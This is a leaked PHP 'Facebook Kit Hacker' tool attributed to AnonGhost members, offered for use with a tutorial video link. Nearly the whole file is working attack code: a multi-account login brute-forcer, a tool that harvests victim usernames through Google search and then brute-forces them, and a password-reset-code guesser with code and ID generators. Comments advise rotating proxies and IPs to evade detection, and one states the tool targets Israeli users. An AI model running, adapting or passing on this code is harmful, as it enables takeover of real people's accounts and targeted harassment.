PHP Facebook Password Bruteforce Script With Video ★ReskayLeaks★
<?php
session_start();
error_reporting(E_ERROR | E_PARSE);
@ini_set("max_execution_time",0);
@set_time_limit(0); #No Fx in SafeMode
@ignore_user_abort(TRUE);
@set_magic_quotes_runtime(0);
// Use your mind to escape Facebook Security \!/
// Don't Allow Cookies in your browser (Use priv8 browsing)
// Change your IP and DNS each 2 seconds and your Job will be Great °_°
// GreetZ To : All AnonGhost MemberZ \!/
// You can edit this script but don't forget to mention the authors °_°
// Tutorial Video: https://www.youtube.com/watch?v=66a_wOwOT48
echo '
<html>
<title>Facebook Kit</title><link rel="shortcut icon" href="http://www14.0zz0.com/2014/06/04/21/396554394.png" type="image/x-icon" />
<body style="background-color:black;">
<style type="text/css">
body {
background:
url("http://i.imgur.com/hg21xZ9.png") repeat ,
url("http://www.albertpalacci.org/wp-content/uploads/2014/08/fb-relationships-full.png") no-repeat center top,top left,top right;
background-color: #000000;
}
a{
text-decoration:none;
border:1px solid #12549c;
border-radius:5px;
background-color:black;
color:white;
font-family:Arial;
font-size:17;
box-shadow: 0px 0px 12px #21a0ed;
}
#r{
border-bottom:1px solid #12549c;
}
</style>
<head>
</body>
</html>
<center><font color="white" face="Orbitron" size="7" align="center">Facebook Kit Hacker v 1.2</font></center>
';
echo '<center>'.base64_decode("PGltZyBzcmM9Imh0dHA6Ly9oYWNrLXRvdXQuY29tL3dwLWNvbnRlbnQvdXBsb2Fkcy8yMDE0LzAyL0ZhY2Vib29rLnBuZyIvPg==").'</center>';
echo '<center><font color="#007700" face="Tahoma, Geneva, sans-serif" style="font-size: 8pt">';
echo '</font></b></div><br></center>';
?>
<div id="det" align="center">
</div>
</center>
<div id="r" align="center">
<a href="<?php echo htmlentities($_SERVER['PHP_SELF']); ?>"> Home </a></font>
<a href="?action=baipas"> FB Brute Force </a></font>
<a href="?action=brut"> FB Ghost Catcher </a></font>
<a href="?action=crack"> FB Reset Code </a></font>
<a href="?action=passgen"> Reset Code Generator </a></font>
<a href="?action=idgen"> FB ID Generator </a></font>
<a href="?action=graph"> FB ID Checker </a></font>
<audio autoplay> <source src="http://www.soundescapestudios.com/SESAudio/SES%20Site%20Sounds/Beeps/Beeps-short-01.wav" type="audio/mpeg"></audio>
</div><br>
<?php
if(isset($_GET['action']) && $_GET['action'] == 'idgen'){
@error_reporting(0);
function getRandomString() { //Facebook Email Admin Page Default Lenght is 13 so don't change it xD wkwkwkkw !
$validCharacters = "0123456789"; // Here you are free to choose how to randomize your words ^_^
$validCharNumber = strlen($validCharacters);
$len = 10;
$result = "";
for ($i = 0; $i < $len; $i++) {
$index = mt_rand(0, $validCharNumber - 1);
$result .= $validCharacters[$index];
}
return $result;
}
echo'
<style>
textarea {
resize:none;
color: #1975FF ;
border:1px solid #1975FF ;
border-left: 4px solid #1975FF ;
}
input {
color: ##33CCFF;
border:1px dotted #33CCFF;
}
</style>
<p><center><font face="impact" color="White" size="4">Facebook ID Generator
</center><center></font><br>
<title>Facebook ID Generator</title>
<form method="post">
<font color="white">Number Of ID : <br><input type="text" name="nr"><br><br></font>
<input type="submit" value="Generate" name="fbmailgen">
</form><br>';
$len = $_POST['len'];
$nr = $_POST['nr'];
if ($_POST['fbmailgen']) {
echo"<textarea style='resize:none;' class='area' cols='45' rows='10'>";
for ($x=0; $x < $nr ; $x++){
echo "10000" . getRandomString() . "\r\n";
}
echo "</textarea><br>";
echo "
<br>
<b>
</b>
<br>
";
}
}
if(isset($_GET['action']) && $_GET['action'] == 'passgen'){
@error_reporting(0);
function getRandomString() { //Facebook Email Admin Page Default Lenght is 13 so don't change it xD wkwkwkkw !
$validCharacters = "0123456789"; // Here you are free to choose how to randomize your words ^_^
$validCharNumber = strlen($validCharacters);
$len = 6;
$result = "";
for ($i = 0; $i < $len; $i++) {
$index = mt_rand(0, $validCharNumber - 1);
$result .= $validCharacters[$index];
}
return $result;
}
echo'
<style>
textarea {
resize:none;
color: #1975FF ;
border:1px solid #1975FF ;
border-left: 4px solid #1975FF ;
}
input {
color: ##33CCFF;
border:1px dotted #33CCFF;
}
</style>
<p><center><font face="impact" color="White" size="4">Facebook Reset Code Generator</font>
</center><center><br>
<title>Facebook Reset Code Generator</title>
<form method="post">
<font color="white">Number Of Reset Codes : <input type="text" name="nr"><br><br></font>
<input type="submit" value="Generate" name="fbmailgen">
</form><br>';
$len = $_POST['len'];
$nr = $_POST['nr'];
if ($_POST['fbmailgen']) {
echo"<textarea style='resize:none;' class='area' cols='20' rows='10'>";
for ($x=0; $x < $nr ; $x++){
echo getRandomString() . "\r\n";
}
echo "</textarea><br>";
echo "
<br>
<b>
</b>
<br>
";
}
}
if(isset($_GET['action']) && $_GET['action'] == 'brut'){
echo"
<style>
textarea {
resize:none;
color: #1975FF ;
border:1px solid #1975FF ;
border-left: 4px solid #1975FF ;
}
input {
color: ##33CCFF;
border:1px dotted #33CCFF;
}
select {
color: ##33CCFF;
border:1px dotted #33CCFF;
}
</style>
<title>F4c3b00k Gh0sT</title>
<form method='POST'>
<center><font face='impact' size='4' color='white'>Facebook Gh0sT Catcher by n0name-hax0r & Mauritania Attacker</font><br></center><br>
<center>
<center><font face='arial' size='1' color='red'>Server</font><br></center>
<select name=country><br><br>
<option value='Choose Country'>Choose The Country</option>
<option value='site:fr-fr.facebook.com/'>France</option>
<option value='site:ar-ar.facebook.com/'>Arab Countries</option>
<option value='site:es-es.facebook.com/'>Spain</option>
<option value='site:tr-tr.facebook.com/'>Turkey</option>
<option value='site:de-de.facebook.com/'>Germany</option>
<option value='site:pt-pt.facebook.com/'>Portugual</option>
<option value='site:it-it.facebook.com/'>Italy</option>
<option value='site:hi-in.facebook.com/'>India</option>
<option value='site:sr-rs.facebook.com/'>Serbia</option>
<option value='site:el-gr.facebook.com/'>Greece</option>
<option value='site:he-il.facebook.com/'>Israel</option>
<option value='site:id-id.facebook.com/'>Indonesia</option>
<option value='site:ru-ru.facebook.com/'>Russia</option>
<option value='site:nl-nl.facebook.com/'>Netherlands</option>
<option value='site:bg-bg.facebook.com/'>Bulgaria</option>
<option value='site:mk-mk.facebook.com/'>Macedonia</option>
<option value='site:uk-ua.facebook.com/'>Ukraine</option>
<option value='site:zh-cn.facebook.com/'>China</option>
</select><br><br>
</center>
<center>
<input type='text' name='victim' placeholder='Victim Name'><br><br>
<textarea name='pass' style='resize:none;' rows='10' cols='20' placeholder='Password List'></textarea><br><br>
<input type='submit' name='start' value='~~Start Catching~~'></center><br><br>
</form>
<center>
<font color='white'>(Use this tool using proxy and change the proxy every 1-2 mins to avoid getting banned from google)</font><br><br>
";
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
function letItBy(){ ob_flush(); flush(); }
$country = $_POST['country'];
$victim = $_POST['victim'];
$bing = "{$country}"."{$victim}";
$password = explode("\r\n",$_POST['pass']);
//Function that gets google urls
function google_that($query, $page=1)
{
$resultPerPage=8;
$start = $page*$resultPerPage;
$url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
$resultFromGoogle = json_decode( http_get($url, true) ,true);
if(isset($resultFromGoogle['responseStatus'])) {
if($resultFromGoogle['responseStatus'] != '200') return false;
if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
else return $resultFromGoogle['responseData']['results'];
}
else
die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
}
function http_get($url, $safemode = false){
if($safemode === true) sleep(1);
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
curl_close();
}
function brute($user,$pass){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/login.php?login_attempt=1");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
curl_setopt($ch, CURLOPT_POSTFIELDS, "email={$user}&pass={$pass}");
curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/36.0.1985.125");
$login = curl_exec($ch);
//print_r($login);
$check = (eregi('class="s t i u"',$login)) ? true:false;
if($check == true){
echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>Not the right one :( || Username : <font color='red'>$user</font> Password : <font color='red'>$pass</font></font></p>";
}else{
echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>This Password Seems Working !Try It ^_^ || Username: <font color='green'>$user</font> Password : <font color='green'>$pass</font></font></p>";
}
}
if(isset($_POST['start'])){
letItBy();
for($googlePage = 1; $googlePage <= 50; $googlePage++) {
$googleResult = google_that($bing, $googlePage);
if(!$googleResult) {
echo 'Finished scanning.';
break;
}
// Gets the username of victim
for($victim = 0; $victim < sizeof($googleResult); $victim++){
$result = $googleResult[$victim]['unescapedUrl'];
if($country == "site:fr-fr.facebook.com/"){
$rsss = str_replace("https://fr-fr.facebook.com/","",$result);
}
elseif($country == "site:ar-ar.facebook.com/"){
$rsss = str_replace("https://ar-ar.facebook.com/","",$result);
}
elseif($country == "site:es-es.facebook.com/"){
$rsss = str_replace("https://es-es.facebook.com/","",$result);
}
elseif($country == "site:tr-tr.facebook.com/"){
$rsss = str_replace("https://tr-tr.facebook.com/","",$result);
}
elseif($country == "site:de-de.facebook.com/"){
$rsss = str_replace("https://de-de.facebook.com/","",$result);
}
elseif($country == "site:pt-pt.facebook.com/"){
$rsss = str_replace("https://pt-pt.facebook.com/","",$result);
}
elseif($country == "site:it-it.facebook.com/"){
$rsss = str_replace("https://it-it.facebook.com/","",$result);
}
elseif($country == "site:hi-in.facebook.com/"){
$rsss = str_replace("https://hi-in.facebook.com/","",$result);
}
elseif($country == "site:zh-cn.facebook.com/"){
$rsss = str_replace("https://zh-cn.facebook.com/","",$result);
}
elseif($country == "site:sr-rs.facebook.com/"){
$rsss = str_replace("https://sr-rs.facebook.com/","",$result);
}
elseif($country == "site:el-gr.facebook.com/"){
$rsss = str_replace("https://el-gr.facebook.com/","",$result);
}
elseif($country == "site:he-il.facebook.com/"){
$rsss = str_replace("https://he-il.facebook.com/","",$result);
}
elseif($country == "site:id-id.facebook.com/"){
$rsss = str_replace("https://id-id.facebook.com/","",$result);
}
elseif($country == "site:ru-ru.facebook.com/"){
$rsss = str_replace("https://ru-ru.facebook.com/","",$result);
}
elseif($country == "site:nl-nl.facebook.com/"){
$rsss = str_replace("https://nl-nl.facebook.com/","",$result);
}
elseif($country == "site:bg-bg.facebook.com/"){
$rsss = str_replace("https://bg-bg.facebook.com/","",$result);
}
elseif($country == "site:mk-mk.facebook.com/"){
$rsss = str_replace("https://mk-mk.facebook.com/","",$result);
}
elseif($country == "site:uk-ua.facebook.com/"){
$rsss = str_replace("https://uk-ua.facebook.com/","",$result);
}
$users = explode("?", $rsss);
$users = $users[0];
//Bruteforce Function
foreach($password as $pass)
{
echo brute($users,$pass);
}
}
}
}
@system("del cookie.txt"); //Delete cookies command for win server.
@system("rm cookie.txt"); // Delete cookies command for linux server.
}
if(isset($_GET['action']) && $_GET['action'] == 'baipas'){
ob_start();
@set_time_limit(0);
#################################################
#---------------------------------------------- #
# Facebook Brute Force 2014 #
#Coded by : Mauritania Attacker&Noname-Haxor #
#Greetz : All AnonGhost Members #
#This Tool Is For Erasing Israel in Fb #
# --------------------------------------------- #
#################################################
echo "
<head>
<link rel='icon' type='image/ico' href='http://media.stateofq.com/photologue/photos/cache/facebook%20favicon_thumbnail.png'/>
<form method='POST'>
<title>Facebook Brute Force 2014</title>
</head>
<style>
textarea {
resize:none;
color: #1975FF ;
border:1px solid #1975FF ;
border-left: 4px solid #1975FF ;
}
input {
color: ##33CCFF;
border:1px dotted #33CCFF;
}
</style>";
echo "
<body text='#FFFFFF' >
<center><font color='White' size=4 face='impact' >Facebook Multi-Account BruteForce by Mauritania Attacker&Noname-Haxor </center></font><br>
<p dir='ltr' align='center'>
<textarea cols='22' class='area' placeholder='Username' rows='14' name='username'></textarea>
<textarea cols='22' class='area' placeholder='Password' rows='14' name='password'></textarea><br>
<br>
<input type='submit' name='scan' value='Start BruteForce'><br></p>";
if(isset($_POST['scan'])){
#To Put Proxy SOCKS V5
//curl_setopt($ch, CURLOPT_PROXY, "proxy:port");
//curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
function brute($user,$pass){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/login.php?login_attempt=1");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
curl_setopt($ch, CURLOPT_POSTFIELDS, "email={$user}&pass={$pass}");
curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/36.0.1985.125");
$login = curl_exec($ch);
//print_r($login);
$check = (eregi('class="s t i u"',$login)) ? true:false;
if($check == true){
echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>Not the right one :( || Username : <font color='red'>$user</font> Password : <font color='red'>$pass</font></font></p>";
}else{
echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>This Password Seems Working !Try It ^_^ || Username: <font color='green'>$user</font> Password : <font color='green'>$pass</font></font></p>";
}
}
$username = explode("\n", $_POST['username']);
$password = explode("\n", $_POST['password']);
foreach($username as $users) {
$users = @trim($users);
foreach($password as $pass) {
$pass = @trim($pass);
echo brute($users,$pass);
}
}
@system("del cookie.txt"); //Delete cookies command for win server.
@system("rm cookie.txt"); // Delete cookies command for linux server.
}
echo"<br>
<br>
<br>
<br>
";
}
if(isset($_GET['action']) && $_GET['action'] == 'crack'){
/*
[+] Facebook Code Security Cracker
[+] Coded By : Mauritania Attacker
[+] GreetZ : All AnonGhost MemberZ
[+] FuCk Priv888888888888888888888
~~HACKING IS ART OF EXPLOITATION~~
<3 <3 <3 I'm not educated , I hate school , Hacking is my life xD !!!!!!!!!!!!!!!!!!!!!!!!!! <3 <3 <3
// How to use: Restore your victim account and better choose the email option :p , and the rest is to use your mind \!/
I suggest you to use an auto rotating proxy after each 2 minutes so you won't get banned :D , i've bypassed already the captcha
security and cookies ,so facebook won't let you try many attempts so proxy is the solution !
you still can add a proxy socks v5 option in Curl only two lines :
curl_setopt($ch, CURLOPT_PROXY, "proxy:port");
curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
You can edit my script and try to develop it more if you have some ideas you are free , but don't forget the Copyright wkwkwkwkwkwk xd <3
Sharing is Caring \!/
Sorry my english is bad and i'm lazy xD !
*/
@set_time_limit(0);
echo "<form method='POST'>
<title>Facebook Code Security Cracker > By Mauritania Attacker</title>
<style>
/* Rounded Corners */
#ghost {
resize:none;
color: #1975FF ;
border:1px solid #1975FF ;
border-left: 4px solid #1975FF ;
height: 250px;
width: 200px; }
input {
/* INPUTS */
border: 1px solid #12549c;
}
</style>
<center><font color='White' size='4' face='impact'>Facebook 0day Exploit Reset Code Priv8 By Mauritania Attacker</center><br>
<center><input type='text' name='target' placeholder='Victim'></center><br>
<center><textarea cols='10' rows='6' id='ghost' placeholder='Reset Codes' name='code'></textarea><br></center>
<p><center><input type='submit' value='Crack Reset Code' name='scan'><br><br></center></p>
</form>";
$target=$_POST['target'];
$user = explode("\r\n", $_POST['code']);
if($_POST['scan'])
{
foreach($user as $code)
{
// Curl Function ^_^
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/recover/password?u={$target}&n={$code}");
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/35.0.1916.114"); // change this with your real useragent infos (browser & version)
$check = curl_exec($ch);
if(eregi("password_new", $check)) //Keyword Good Response ^_^
{
echo "<font face='Tahoma' size='2' color='green'>{$code} => Facebook Confirmation Code Found ^_^ </font><br>";
}
else
{
echo "<font face='Tahoma' size='2' color='red'>{$code} => Incorrect Code Trying More...</font><br>";
}
curl_close($ch);
}
}
@system("del cookie.txt"); //Delete cookies command for win server.
@system("rm cookie.txt"); // Delete cookies command for linux server.
}
echo "</center><center>";
ob_end_flush();
echo '<center><font color="red" face="arial" size="2" align="">Coded By Mauritania Attacker & n0name-hax0r</font></center>';
if(isset($_GET['action']) && $_GET['action'] == 'graph'){
@set_time_limit(0);
echo "<form method='POST'>
<title>Facebook ID's Checker By Mauritania Attacker</title>
<style>
/* Rounded Corners */
#ghost {
resize:none;
color: #1975FF ;
border:1px solid #1975FF ;
border-left: 4px solid #1975FF ;
height: 250px;
width: 200px; }
input {
/* INPUTS */
border: 1px solid #12549c;
}
</style>
<center><font color='White' size='4' face='impact'>Facebook ID's Checker By Mauritania Attacker</center><br>
<center><textarea cols='10' rows='6' id='ghost' placeholder='ID Here ^^' name='code'></textarea><br></center>
<p><center><input type='submit' value='Check Now' name='scan'><br><br></center></p>
</form>";
$user = explode("\r\n", $_POST['code']);
if($_POST['scan'])
{
foreach($user as $code)
{
// Curl Function ^_^
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://graph.facebook.com/{$code}");
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/35.0.1916.114");
$check = curl_exec($ch);
if(eregi("username", $check)) //Keyword Good Response ^_^
{
echo "<font face='Tahoma' size='2' color='green'>{$code} => ID IS CORRECT ^_^ </font><br>";
}
else
{
echo "<font face='Tahoma' size='2' color='red'>{$code} => ID IS FALSE :(...</font><br>";
}
curl_close($ch);
}
}
@system("del cookie.txt"); //Delete cookies command for win server.
@system("rm cookie.txt"); // Delete cookies command for linux server.
}
echo "</center><center>";
ob_end_flush();
echo '<center><font color="red" face="arial" size="2" align="">Coded By Mauritania Attacker & n0name-hax0r</font></center>';
?>